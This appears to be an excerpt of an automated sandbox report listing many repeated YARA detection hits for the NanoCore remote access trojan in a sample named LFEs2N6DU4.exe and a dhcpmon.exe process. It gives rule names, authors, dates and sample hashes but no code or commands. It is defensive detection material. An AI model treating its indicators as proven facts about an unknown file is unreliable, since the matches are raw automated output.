Source: Process Memory Space: dhcpmon.exe PID: 6732, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Source: LFEs2N6DU4.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 25.2.dhcpmon.exe.3c005c4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.dhcpmon.exe.3c005c4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.dhcpmon.exe.3c005c4.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.dhcpmon.exe.3c005c4.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.2.dhcpmon.exe.3374bed.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 26.2.dhcpmon.exe.3374bed.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.2.dhcpmon.exe.38a9b90.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 21.2.dhcpmon.exe.38a9b90.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.2.dhcpmon.exe.38a9b90.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.LFEs2N6DU4.exe.5650000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.LFEs2N6DU4.exe.5650000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.LFEs2N6DU4.exe.24b0e9c.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.LFEs2N6DU4.exe.24b0e9c.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.LFEs2N6DU4.exe.24b0e9c.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.LFEs2N6DU4.exe.24b0e9c.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.LFEs2N6DU4.exe.24b0e9c.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.LFEs2N6DU4.exe.24b0e9c.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.dhcpmon.exe.2bb0b34.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.dhcpmon.exe.2bb0b34.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.dhcpmon.exe.2bb0b34.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.dhcpmon.exe.3c59b90.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.dhcpmon.exe.3c59b90.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.dhcpmon.exe.3c59b90.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.LFEs2N6DU4.exe.3559b90.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.LFEs2N6DU4.exe.3559b90.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.LFEs2N6DU4.exe.3559b90.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 24.2.LFEs2N6DU4.exe.41c05c4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 24.2.LFEs2N6DU4.exe.41c05c4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.LFEs2N6DU4.exe.4171b50.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.2.LFEs2N6DU4.exe.4171b50.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.LFEs2N6DU4.exe.4171b50.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.dhcpmon.exe.2bb0b34.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.dhcpmon.exe.2bb0b34.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.dhcpmon.exe.2bb0b34.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.2.dhcpmon.exe.33705c4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 26.2.dhcpmon.exe.33705c4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.LFEs2N6DU4.exe.5650000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.LFEs2N6DU4.exe.5650000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.LFEs2N6DU4.exe.4199b70.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.2.LFEs2N6DU4.exe.4199b70.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.LFEs2N6DU4.exe.4199b70.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.2.dhcpmon.exe.2800d80.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 21.2.dhcpmon.exe.2800d80.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.2.dhcpmon.exe.2800d80.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.2.dhcpmon.exe.2800d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 21.2.dhcpmon.exe.2800d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.2.dhcpmon.exe.2800d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.2.dhcpmon.exe.3c04bed.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.dhcpmon.exe.3c04bed.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.LFEs2N6DU4.exe.34e1b50.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.LFEs2N6DU4.exe.34e1b50.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.LFEs2N6DU4.exe.34e1b50.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.2.dhcpmon.exe.2389698.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 26.2.dhcpmon.exe.2389698.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.2.dhcpmon.exe.3859b70.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 21.2.dhcpmon.exe.3859b70.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.2.dhcpmon.exe.3859b70.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.2.dhcpmon.exe.33705c4.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 26.2.dhcpmon.exe.33705c4.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.LFEs2N6DU4.exe.3df05c4.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.LFEs2N6DU4.exe.3df05c4.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.2.dhcpmon.exe.3859b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 21.2.dhcpmon.exe.3859b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.2.dhcpmon.exe.3859b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.2.dhcpmon.exe.336b78e.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 26.2.dhcpmon.exe.336b78e.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.2.dhcpmon.exe.336b78e.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
